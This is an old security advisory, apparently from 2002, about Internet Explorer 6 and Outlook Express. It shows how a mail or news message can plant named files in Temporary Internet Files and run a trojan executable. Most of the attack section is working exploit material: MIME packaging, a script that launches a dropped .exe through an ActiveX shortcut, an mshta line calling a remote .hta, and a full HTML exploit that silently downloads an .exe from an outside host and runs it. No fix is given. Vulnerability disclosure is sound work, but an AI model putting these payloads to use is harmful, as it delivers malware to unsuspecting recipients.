COMMAND

	Opening Internet related content (web, news, mail) can  lead  to  trojan
	delivery

SYSTEMS AFFECTED

	 Internet Explorer 6.0, Outlook Express 6.0 and 

	 probably Outlook and Outlook 2002.

	

	 Default settings for Outlook Express and Outlook: restricted zone.

PROBLEM

	\'http-equiv\' [http://www.malware.com] says :
	

	

	Internet explorer and accompanying mail  and  news  clients  divert  all
	external  files  into  the  Temporary  Internet  File  (TIF)  which   is
	controlled by the various security settings of the browser.  If  we  can
	strategically place our named files inside the TIF and  determine  their
	exact location, we are in business.
	

	How Do We Do That:
	

	Recent bandages applied to Internet Explorer  currently  transfer  files
	from mail and news to the  TIF  without  given  names  and  with  a  TMP
	extension.  Technically  the  mail  client  is  able  to  determine  the
	contents  of  these  *.TMP  files  through   the   Content-ID   protocol
	(cid:malware) whether the file is a sound file, html  file,  image  file
	etc. and based on the contents  coupled  with  the  given  Content-Type:
	image/gif render or parse accordingly.
	

	Through trivial html we are able to restore our  given  file  names  and
	dictate where our files are to be placed inside the TIF.
	

	Content-Type: audio/x-ms-wma;

	 name=\"malware.wma\"

	Content-Transfer-Encoding: base64

	Content-ID: <mrs.malware>

	Content-Location: file:///malware.wma

	

	In order to ensure all our files end up in the same  folder  within  the
	TIF, we encapsulate the entire \"package\" in MIME  base64  so  that  as
	the self-contained mail message is opened within a particular folder  in
	the TIF, so  all  the  required  files  are  transferred  instantly  and
	silently into that same particular folder.
	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	And:
	

	Now that we have our named files in our known location inside  the  TIF,
	we need to access them to trigger off the entire event. We  utilise  the
	multi-purpose Windows Media Player  and  its  assortment  of  files.  We
	create a very simple media file with 0s URL flip and point that  to  our
	named file in our known location.
	

	 <iframe src=\"cid:mrs.malware\" style=\"display:none\">

	

	Content-Type: audio/x-ms-wma;

	 name=\"malware.wma\"

	Content-Transfer-Encoding: base64

	Content-ID: <mrs.malware>

	Content-Location: file:///malware.wma

	

	Our named file it points to is a very simple *.html file comprising  our
	scripting to determine the location  like so:
	

	malware=document.URL;

	path=malware.substr(-0,malware.lastIndexOf(\"\\\\\"));

	path=unescape(path);

	

	With this information, we utilise an existing possibility  to  call  our
	named *.chm file which has been delivered to  the  TIF  along  with  our
	primary message and  open  it.  Inside  our  *.chm  we  include  a  more
	sophisticated scripting to determine  yet  again  the  location  of  our
	third file, our *.exe which has  also  been  delivered  along  with  our
	primary message:
	

	var malware=\"malware[1].exe\";

	document.writeln(\'<OBJECT id=AA classid=\"clsid:adb880a6-d8ff-11cf-

	9377-00aa003b7a11\" width=10 height=10>\');

	document.writeln(\'<PARAM name=\"Command\" value=\"ShortCut\">\');

	document.writeln(\'  <PARAM name=\"Item1\" 

	value=\",\'+cool.path+malware+\',\">\');

	document.writeln(\'</OBJECT>\');

	setTimeout(\"AA.Click();\",3000);  

	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	This inturn fires our *.exe that we have dropped into the TIF.
	

	Critical Note: it is imperative that our media file is delivered to  the
	TIF and opened from within the TIF through MIME  encapsulation.  Without
	out this the URL filp when triggered will expect to find the  referenced
	file name on the server.
	

	Repeat:
	

	1. Our mail message  or  news  post  containing  our  4  critical  files
	[*.html,  *.chm,  *.wma,  *.exe]  is  fired  off  to  the   unsuspecting
	recipient.
	

	2. Upon opening the  mail  or  news  message,  all  embedded  files  are
	instantly transferred to the TIF with our given file names.  Note:  this
	is in addition to the exact same files transferred  in  accordance  with
	security as *.TMP files. Our 0s media file is then automatically  opened
	by our iframe. This inturn  launches  the  Windows  Media  Player  which
	immediately URL flips to our named *.html file. Obviously,  because  the
	media file resides in the same folder  inside  the  TIF  as  our  *.html
	file, it will call the *.html file.
	

	3. Our *.html file is then opened in a new  browser  window  along  with
	the full path name of its  location.  Our  scripting  to  determine  the
	location and write it inside our *.html is fired. This inturn calls  our
	*.chm file which is opened.
	

	4.  Our  *.chm  file  is  opened  and  our  sophisticated  scripting  to
	determine the location inside that, then  calls  our  *.exe  which  also
	resides in the same folder inside the TIF:
	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	BANG!
	

	The above represents by far the most successful method to achieve  this.
	Primarily because we can (a) dictate our file names and (b)  ensure  all
	necessary files are transferred to the same folder within the TIF.
	

	In the case of Outlook Express  default  settings  and  Outlook  default
	settings, where no scripting and no activex is allowed. We  can  achieve
	similar results substituting our method  of  file  transference  in  the
	above, with a less than robust method. Simply put:
	

	a) embedded media file in iframe -- automatically opened  from  with  in
	the TIF -- no scripting
	

	b)   generic   html    tags    <img    src=malware.html...<bgsound
	src=*.chm...etc will deposit our required  files  inside  the  TIF--  no
	scripting but not always in the same folder. To do this we need to  draw
	the  files  remotely  from  a  server  in  order  to  ensure  they   are
	transferred with given file names. 5 out of  10  times  we  can  achieve
	success but in typical fashion the Internet  Explorer  6  browser  under
	unidentifiable  conditions  (at  whim),  can  transfer  each  file  into
	different folders inside the TIF.
	

	In the case of Internet Explorer 6 simply converting our  mail  or  news
	message to *.mhtml format and in particular  our  first  scenario  above
	where all files are embedded,  results  in  99.999%  success.  Obviously
	that 1% being the most important, and  that  is  launching  the  Windows
	Media Player in order to invoke our URL flip. No  matter  how  examined,
	despite  all  necessary  files  with  file  names  being  in  the  known
	location,  it  simply  refuses  interpret  the   path   to   the   media
	file.Without a doubt a solution is out there but we are out of time.
	

	Working Examples:
	

	Tested on fully patched Internet Explorer 6 and  Outlook  Express  6  on
	win98
	

	NOTE: all have about a 20 second delay
	

	1. All files fully embedded in the mail message. Open in mail client  in
	internet zone:
	

	Includes harmless *.exe
	

	http://www.malware.com/oxpress.zip

	

	note: there can be a possibility that  the  resulting  file  name  after
	transference differs from OS to OS.
	

	2. Media file fully embedded, all other files remotely  retrieved.  Open
	in mail client in restricted zone.
	

	Includes harmless *.exe
	

	http://www.malware.com/outlook.zip

	

	note 1: there is a great possibility that the resulting transference  is
	to different folders within the TIF.
	

	note 2: this is definitely not fool proof but by decreasing  the  amount
	of required files i.e. only *.chm and *.html with incorporation  of  the
	previous:
	

	C:\\WINDOWS\\SYSTEM\\Mshta.exe,http://www.malware.com/foobar.hta 

	

	link we can leave out the *.exe as it would appear that the  more  files
	transferred the more chances are different folders inside  the  TIF  are
	used.
	

	3. For Internet Explorer 6, simply convert 1  above  to  *.mhtml  format
	and give it a whack. Perhaps some bright spark knows how to remedy  this
	one. Good Luck !
	

	4. For the very few interested, we managed  to  compile  an  *.hta  file
	into a *.chm as well as a RFC822 mail message. Behaviour results in  the
	same as IE6. Nothing spectacular. Technically interesting results:
	

	http://www.malware.com/chm.zip

	

	

	 Update (03 April 2002)

	 ======

	

	On  the  same  trend  Elia  Florio  [eflorio@edmaster.it]   posted   the
	following exploit :
	

	When an HTML page attached into a message, is started, it  runs  in  the
	security zone of  \"\\Temporary Internet Files\" (TIF).
	

	First: we can use the \"dynsrc\" trick of IMG tag to  download  an  .EXE
	from the web - in a silent  way  -  into  TIF  zone.  NOTE:  if  we  use
	\"src\", the browser does not recognize the image format (because  it\'s
	an executable) and download it only in a partial way.
	

	Then - using javascript - we can get local path of \"Temporary  Internet
	Files\" folder where the page was stored from Outlook Express and  where
	the .EXE file will be downloaded. NOTE: we must add \"[1]\"  or  \"[2]\"
	or \"[x]\" at the end of .EXE  filename,  because  IE  rename  temporary
	downloaded files.
	

	Finally, using \".innerHTML\" exploit and knowing the exact path of  the
	executable, we can run the .EXE file using this interesting trick:
	

	 - if we use a path which contains the string \"\\Temporary Internet Files\",

	   IE will refuse to create ActiveX object for security restrictions and

	   does not run the .EXE file;

	

	 - but if we use old-dos path (c:\\windows\\tempor~1\\content.ie5) instead

	   long path (c:\\windows\\temporary internet files\\content.ie5),

	   IE is fooled and run the .EXE file;

	

	This is the JavaScript code for the HTML page (note: you must create  an
	HTML file and attach it to e-mail  message,  this  code  does  not  work
	written directly inside the e-mail, the HTML page must  be  opened  from
	Outlook Express)
	

	The exploit is easy to create if page  and  executable  have  a  similar
	name (for example EXPLOIT.HTML and EXPLOIT.EXE). The .EXE file  must  be
	uploaded into a web-site before.
	

	NOTE: exploit is not  an  \"automatic  execution\"  of  attachment,  the
	victim must open the attached HTML page.
	 

	<HTML>

	<SCRIPT LANGUAGE=\"JavaScript\">

	function runtimer() {

	 //we must wait until .EXE file is copied to \\Temporary Internet Files

	 timerID=setTimeout(\'runit()\',7000)

	}

	

	function runit () {

	  //catch local path of .EXE file

	  var url = document.location.href;

	  var path1=url.substring(8,url.length-5)+\"[1].exe\";

	

	  //we need only the final path string

	  //it starts from /Content.IE5/xxyyzz/

	  i=0;

	  var found=false;

	  var path2=\"\";

	  while(i<path1.length) {

	   if(path1.substring(i,i+2)==\"/C\") {found=true;}

	   if(found) {path2=path2+path1.substring(i,i+1);}

	   i++;

	  }

	

	  //this is the trick using dos name \"Tempor~1\" instead long names

	\"Temporary Internet Files\"

	  path2=\"C:/WINDOWS/Tempor~1\"+path2;

	  alert(\"LOCAL PATH = \"+path2);

	

	  //finally run it with help of .innerHTML

	  document.body.innerHTML = \'<OBJECT NAME=\"X\"

	CLASSID=\"CLSID:11111111-1111-1111-1111-111111111111\"

	CODEBASE=\'+path2+\'></OBJECT>\';

	  }

	</SCRIPT>

	<body onLoad=\"runtimer()\">

	<center>

	<h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>

	<img src=\"_some_image.jpg\"

	dynsrc=\"http://web.tiscali.it/funkybus/exploit.exe\">

	<hr>

	<P>This page download (silently) an .EXE file using \"IMG\" tag

	into \"\\Temporary Internet Files\" folder, then locate the local path

	of the .EXE using JavaScript and run it using .innerHtml exploit.</P>

	<hr>

	Exploit coded by Elia Florio

	(eflorio@edmaster.it)

	</center>

	</body>

	</html>

	

SOLUTION

	??